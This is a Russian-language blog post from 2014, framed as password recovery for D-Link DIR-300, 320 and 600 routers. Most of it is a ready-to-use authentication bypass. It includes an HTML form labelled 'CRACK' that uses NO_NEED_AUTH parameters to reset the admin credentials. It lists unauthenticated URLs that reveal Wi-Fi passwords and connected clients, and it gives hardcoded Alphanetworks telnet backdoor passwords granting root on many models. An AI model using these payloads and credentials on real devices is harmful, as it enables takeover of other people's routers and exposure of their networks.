пятница, 7 февраля 2014 г.

Как получить доступ к админке D-Link DIR-300, 320 и 600, сброс или восстановление пароля

     Допустим, вы забыли свой пароль на админку роутера D-Link DIR-300, 320 и 600.

Если необходимо взломать пароль д линк 320 (а также моделей д-линк 300, 600), то просто создайте текстовый файл с текстом запроса POST, сохраните его в html формате и откройте в браузере. Вы увидите все лишь одну кнопку, нажав на нее, вы смените логин и пароль на роутере на стандартный логин admin и пароль admin.   Код POST запроса для сброса пароля:

1
2
3
4
5
6
7
8
9
10
11
12
13
<form action="http://192.168.0.1/tools_admin.php" method="POST">
 <input type="hidden" name="ACTION_POST" value="LOGIN" />
 <input type="hidden" name="LOGIN_USER" value="a" />
 <input type="hidden" name="LOGIN_PASSWD" value="b" />
 <input type="hidden" name="login" value="+Log+In+" />
 <input type="hidden" name="NO_NEED_AUTH" value="1" />
 <input type="hidden" name="AUTH_GROUP" value="0" />
 Login:
 <input type="text" name="admin_name" value="admin" />
 Password:
 <input type="text" name="admin_password1" value="admin" />
 <input type="submit" value="CRACK" />
</form>

 Пароль поменяется с первой же попытки, хоть и написано "настройки не изменены", однако пароль изменился на стандартный admin.   

Доступ к настройке DIR-300 без пароля и авторизации   

Если непонятно как взломать пароль роутер d-link dir-300, то можно узнать настройки и статистику можно с помощью добавления к стандартным линкам: ?NO_NEED_AUTH=1&AUTH_GROUP=0 например: http://192.168.0.1/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 - Настройка беспроводной сети, можно узнать имя, пароль, тип шифрования. 
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 - Настройки сети, можно посмотреть настройки DHCP и кто сейчас подключен к роутеру. 
http://192.168.0.1/bsc_wan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 - страница ручной настройки интернета. 
http://192.168.0.1/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0 - административные настройки, изменение пароля на вход в роутер.

п.с. ну адреса соответственно меняем на адрес вашего роутера :)


В новых версиях прошивок данную ошибку прикрыли, но осталась возможность просматривать настройки, для этого достаточно передавать некоторые параметры в GET запросах к роутеру:
1
http://192.168.0.1/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
Подробнее можно почитать тут.
Есть еще одна возможность. При включении/перезагрузке роутера на некоторое время запускается telnet-сервер доступный всем пользователям LAN/WLAN, который можно использовать для безусловного получения полных административных прав (root) на роутере. Стандартная учетная запись:Alphanetworks Пароль: wrgg19_c_dlwbr_dir300
Тов. N!K!TA подбросил еще пару возможных паролей: wrgn23_dlwbr_dir300bи wrgn49_dlob_dir300b5
Вот еще для Dir-320 wrgg27_dlwbr_dir320
Вот еще пары — логин-пароль от PingWinbl4:
Alphanetworks wrgg19_c_dlwbr_dir300

Alphanetworks wrgn49_dlob_dir600b

Alphanetworks wrgn23_dlwbr_dir600b

Alphanetworks wrgn22_dlwbr_dir615

Alphanetworks wrgnd08_dlob_dir815

Alphanetworks wrgg15_di524

Alphanetworks wrgn39_dlob.hans_dir645